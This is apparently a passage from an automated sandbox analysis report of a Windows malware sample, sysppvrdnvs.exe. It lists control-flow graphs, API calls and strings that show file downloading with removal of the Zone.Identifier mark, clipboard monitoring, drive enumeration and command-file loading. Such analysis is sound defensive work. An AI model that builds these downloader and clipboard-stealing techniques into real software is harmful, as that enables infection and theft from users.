                                                                                                                                                                                              • rand.MSVCRT ref: 0040F7E0
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040F807
                                                                                                                                                                                              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
                                                                                                                                                                                              • wsprintfW.USER32 ref: 0040F844
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0040F854
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 0040F85F
                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 0040F880
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040F8A7
                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 0040F8B6
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                                                                                              • String ID: y@$%s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$.#v
                                                                                                                                                                                              • API String ID: 1632876846-875060203
                                                                                                                                                                                              • Opcode ID: f66bbaa90db6dfc7324bdba7ae9ae0bc4e4b122ccc0d7fa92996eb741fb39ab1
                                                                                                                                                                                              • Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
                                                                                                                                                                                              • Opcode Fuzzy Hash: f66bbaa90db6dfc7324bdba7ae9ae0bc4e4b122ccc0d7fa92996eb741fb39ab1
                                                                                                                                                                                              • Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 115 40b850-40b867 call 40b780 118 40b869 115->118 119 40b86e-40b88a call 40b3d0 strcmp 115->119 120 40baf5-40baf8 118->120 123 40b891-40b8ad call 40b3d0 strstr 119->123 124 40b88c 119->124 127 40b8f0-40b90c call 40b3d0 strstr 123->127 128 40b8af-40b8cb call 40b3d0 strstr 123->128 124->120 135 40b90e-40b92a call 40b3d0 strstr 127->135 136 40b94f-40b96b call 40b3d0 strstr 127->136 133 40b8eb 128->133 134 40b8cd-40b8e9 call 40b3d0 strstr 128->134 133->120 134->127 134->133 145 40b94a 135->145 146 40b92c-40b948 call 40b3d0 strstr 135->146 143 40b96d-40b989 call 40b3d0 strstr 136->143 144 40b9ae-40b9c4 EnterCriticalSection 136->144 155 40b9a9 143->155 156 40b98b-40b9a7 call 40b3d0 strstr 143->156 148 40b9cf-40b9d8 144->148 145->120 146->136 146->145 151 40ba09-40ba14 call 40bb00 148->151 152 40b9da-40b9ea 148->152 163 40baea-40baef LeaveCriticalSection 151->163 164 40ba1a-40ba28 151->164 157 40ba07 152->157 158 40b9ec-40ba05 call 40df20 152->158 155->120 156->144 156->155 157->148 158->151 163->120 167 40ba2a 164->167 168 40ba2e-40ba30 call 40a740 164->168 167->168 170 40ba35-40ba3f 168->170 170->163 171 40ba45-40ba62 call 40df20 170->171 174 40ba64-40ba74 171->174 175 40baba-40bad2 171->175 177 40ba80-40bab8 call 40ab60 174->177 178 40ba76-40ba7e Sleep 174->178 176 40bad8-40bae3 call 40bb00 175->176 176->163 183 40bae5 call 40b530 176->183 177->176 178->174 183->163
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
                                                                                                                                                                                                • Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE
                                                                                                                                                                                              • strcmp.NTDLL ref: 0040B880
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: gethostbynamegethostnamestrcmp
                                                                                                                                                                                              • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                                                                                              • API String ID: 2906596889-2213908610
                                                                                                                                                                                              • Opcode ID: be1adfb21df1672b179acddae554e562d68734a0439b0a0b8caddf7385871258
                                                                                                                                                                                              • Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
                                                                                                                                                                                              • Opcode Fuzzy Hash: be1adfb21df1672b179acddae554e562d68734a0439b0a0b8caddf7385871258
                                                                                                                                                                                              • Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 185 4059b0-4059d2 GetWindowLongW 186 4059d4-4059db 185->186 187 4059f6-4059fd 185->187 188 4059e1-4059e5 186->188 189 405a67-405a78 IsClipboardFormatAvailable 186->189 190 405a26-405a2c 187->190 191 4059ff 187->191 192 405a04-405a21 SetClipboardViewer SetWindowLongW 188->192 193 4059e7-4059eb 188->193 197 405a83-405a8d IsClipboardFormatAvailable 189->197 198 405a7a-405a81 189->198 195 405a46-405a4a 190->195 196 405a2e-405a44 SetWindowLongW 190->196 194 405be4-405bfd DefWindowProcA 191->194 192->194 202 4059f1 193->202 203 405b9d-405bde RegisterRawInputDevices ChangeClipboardChain 193->203 204 405a62 195->204 205 405a4c-405a5c SendMessageA 195->205 196->204 200 405a98-405aa2 IsClipboardFormatAvailable 197->200 201 405a8f-405a96 197->201 199 405aab-405aaf 198->199 207 405ab5-405abf OpenClipboard 199->207 208 405b7f-405b83 199->208 200->199 206 405aa4 200->206 201->199 202->194 203->194 204->194 205->204 206->199 207->208 209 405ac5-405ad6 GetClipboardData 207->209 210 405b85-405b95 SendMessageA 208->210 211 405b9b 208->211 212 405ad8 209->212 213 405add-405aee GlobalLock 209->213 210->211 211->194 212->194 214 405af0 213->214 215 405af5-405b06 213->215 214->194 216 405b08-405b0c 215->216 217 405b29-405b3c call 40d250 215->217 219 405b3e-405b4e call 4057f0 216->219 220 405b0e-405b12 216->220 225 405b51-405b65 GlobalUnlock CloseClipboard 217->225 219->225 223 405b14 220->223 224 405b16-405b27 call 405680 220->224 223->225 224->225 225->208 229 405b67-405b7c call 404970 call 40ab60 225->229 229->208
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004059BC
                                                                                                                                                                                              • SetClipboardViewer.USER32(?), ref: 00405A08
                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
                                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405AB7
                                                                                                                                                                                              • GetClipboardData.USER32(00000000), ref: 00405AC9
                                                                                                                                                                                              • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
                                                                                                                                                                                              • ChangeClipboardChain.USER32(?,?), ref: 00405BDE
                                                                                                                                                                                              • DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3549449529-0
                                                                                                                                                                                              • Opcode ID: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                                                                              • Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f0b22ba391b773d4c45c64ac6dadd066d7720e91bacc99fadb97576ecf3cd51
                                                                                                                                                                                              • Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00406F7E
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysppvrdnvs.exe,00000104), ref: 00406F90
                                                                                                                                                                                                • Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                                                                                • Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                                                                                • Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 004070FA
                                                                                                                                                                                                • Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                                                                                • Part of subcall function 004063E0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                                                                                • Part of subcall function 004063E0: RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                                                                                • Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                                                                              • Sleep.KERNEL32(000007D0), ref: 004070ED
                                                                                                                                                                                                • Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353
                                                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
                                                                                                                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
                                                                                                                                                                                              • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00407072
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00407092
                                                                                                                                                                                              • wsprintfW.USER32 ref: 004070B5
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                              • String ID: (%dGB)$%s%s$C:\Windows\sysppvrdnvs.exe$Unnamed volume
                                                                                                                                                                                              • API String ID: 1650488544-747518629
                                                                                                                                                                                              • Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                                                                              • Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
                                                                                                                                                                                              • Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 004058D8
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 00405904
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040590A
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00405913
                                                                                                                                                                                              • wsprintfW.USER32 ref: 00405926
                                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 00405933
                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00405985
                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 0040598F
                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 004059A1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                              • String ID: %x%X$0
                                                                                                                                                                                              • API String ID: 716646876-225668902
                                                                                                                                                                                              • Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                                                                              • Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
                                                                                                                                                                                              • Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
                                                                                                                                                                                              • Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 264 40f240-40f27f CreateFileW 265 40f285-40f2a0 CreateFileMappingW 264->265 266 40f39a-40f39e 264->266 269 40f390-40f393 265->269 270 40f2a6-40f2bf MapViewOfFile 265->270 267 40f3a0-40f3c0 CreateFileW 266->267 268 40f3f4-40f3fa 266->268 273 40f3c2-40f3e1 WriteFile 267->273 274 40f3e8-40f3f1 call 40ab60 267->274 269->266 271 40f2c5-40f2db GetFileSize 270->271 272 40f386-40f389 270->272 275 40f2e1-40f2f4 call 40d1a0 271->275 276 40f37c-40f380 UnmapViewOfFile 271->276 272->269 273->274 274->268 275->276 281 40f2fa-40f309 275->281 276->272 281->276 282 40f30b-40f32b call 40cb40 281->282 284 40f330-40f33a 282->284 284->276 285 40f33c-40f367 call 40ae90 memcmp 284->285 285->276 288 40f369-40f375 call 40ab60 285->288 288->276
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
                                                                                                                                                                                              • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
                                                                                                                                                                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
                                                                                                                                                                                              • memcmp.NTDLL ref: 0040F35D
                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040F38A
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F394
                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
                                                                                                                                                                                              • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F3E2
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                                                                                              • String ID: .#v
                                                                                                                                                                                              • API String ID: 3902698870-507759092
                                                                                                                                                                                              • Opcode ID: 7d502bbc833238380c95321b91a828a1a785b751e7efdeca87fc0906aa905e9c
                                                                                                                                                                                              • Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d502bbc833238380c95321b91a828a1a785b751e7efdeca87fc0906aa905e9c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 309 40bc70-40bc88 InitializeCriticalSection 310 40bc93-40bc9a 309->310 311 40bcb9-40bcda CreateFileW 310->311 312 40bc9c-40bcaf call 40df20 call 40b850 310->312 314 40bce0-40bcfb CreateFileMappingW 311->314 315 40bda2-40bdc5 call 40b510 call 40dbe0 311->315 324 40bcb4-40bcb7 312->324 317 40bd01-40bd1a MapViewOfFile 314->317 318 40bd98-40bd9b 314->318 321 40bd1c-40bd39 GetFileSize 317->321 322 40bd8e-40bd91 317->322 318->315 325 40bd4d-40bd53 321->325 322->318 324->310 329 40bd84-40bd88 UnmapViewOfFile 325->329 330 40bd55-40bd5c 325->330 329->322 330->329 331 40bd5e-40bd82 call 40df20 call 40b850 330->331 331->325
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
                                                                                                                                                                                              • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
                                                                                                                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
                                                                                                                                                                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040BD92
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 0040BD9C
                                                                                                                                                                                                • Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
                                                                                                                                                                                                • Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                              • String ID: C:\Users\user\tbtnds.dat$.#v
                                                                                                                                                                                              • API String ID: 439099756-2305399225
                                                                                                                                                                                              • Opcode ID: af5c3b123f5e80eaa084090c55f6f129bab75b0b75ad2690ce5f7c53b1f27bcc
                                                                                                                                                                                              • Instruction ID: 789285c27e92e60cc42243599a26330008c438e37824d2da8ff51af530b364ad
                                                                                                                                                                                              • Opcode Fuzzy Hash: af5c3b123f5e80eaa084090c55f6f129bab75b0b75ad2690ce5f7c53b1f27bcc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F413A74E40309EBDB10EBA4DC4ABAEB774EB44705F20856AF6117A2C1C7B96941CB9C

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 337 405c00-405c32 InitializeCriticalSection CreateFileW 338 405d25-405d28 337->338 339 405c38-405c53 CreateFileMappingW 337->339 340 405c59-405c72 MapViewOfFile 339->340 341 405d1b-405d1e 339->341 342 405d11-405d14 340->342 343 405c78-405c8a GetFileSize 340->343 341->338 342->341 344 405c8d-405c91 343->344 345 405c93-405c9a 344->345 346 405d07-405d0b UnmapViewOfFile 344->346 347 405c9c 345->347 348 405c9e-405cb1 call 40d1d0 345->348 346->342 347->346 351 405cb3 348->351 352 405cb5-405cca 348->352 351->346 353 405cda-405d05 call 405d30 352->353 354 405ccc-405cd8 call 40ab60 352->354 353->344 354->346
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
                                                                                                                                                                                              • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
                                                                                                                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
                                                                                                                                                                                              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
                                                                                                                                                                                              • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
                                                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405D15
                                                                                                                                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00405D1F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513091368.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000004.00000002.3513203938.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                              • String ID: C:\Users\user\tbtcmds.dat$.#v
                                                                                                                                                                                              • API String ID: 3956458805-1503835424
                                                                                                                                                                                              • Opcode ID: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                                                                              • Instruction ID: 999418e1eeb904d95552c7fd1475d0c30f1e1fd8627807f9f1e65d0b0efdc9c4
                                                                                                                                                                                              • Opcode Fuzzy Hash: d5d83b1f14bbe53c7a306cab709472362fb8432e959898be764c548cb6fd93a9
                                                                                                                                                                                              • Instruction Fuzzy Hash: DE310E74E40209EBDB14DBA4DC49FAFB774EB48700F20856AE6017B2C0D7B96941CF99

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 383 40dd50-40dd80 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 384 40dd86-40dd9a InterlockedExchangeAdd 383->384 385 40de69-40de80 GetCurrentThread SetThreadPriority 383->385 384->385 386 40dda0-40dda9 384->386 387 40ddac-40ddb3 386->387 387->385 388 40ddb9-40ddd4 EnterCriticalSection 387->388 389 40dddf-40dde7 388->389 390 40de27-40de3c LeaveCriticalSection 389->390 391 40dde9-40ddf6 389->391 394 40de47-40de4d 390->394 395 40de3e-40de45 390->395 392 40de03-40de25 WaitForSingleObject 391->392 393 40ddf8-40de01 391->393 396 40ddd6-40dddc 392->396 393->396 397 40de5c-40de64 Sleep 394->397 398 40de4f-40de58 394->398 395->385 396->389 397->387 398->397 399 40de5a 398->399 399->385
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0040DD56
                                                                                                                                                                                              • GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,02E50638,000000FF), ref: 0040DD5D
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0040DD68
                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,02E50638,000000FF), ref: 0040DD6F
                                                                                                                                                                                              • InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 0040DE5E
                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 0040DE6D
                                                                                                                                                                                              • SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.3513006957.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              • Associated: 00000004.00000002.3512924447.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
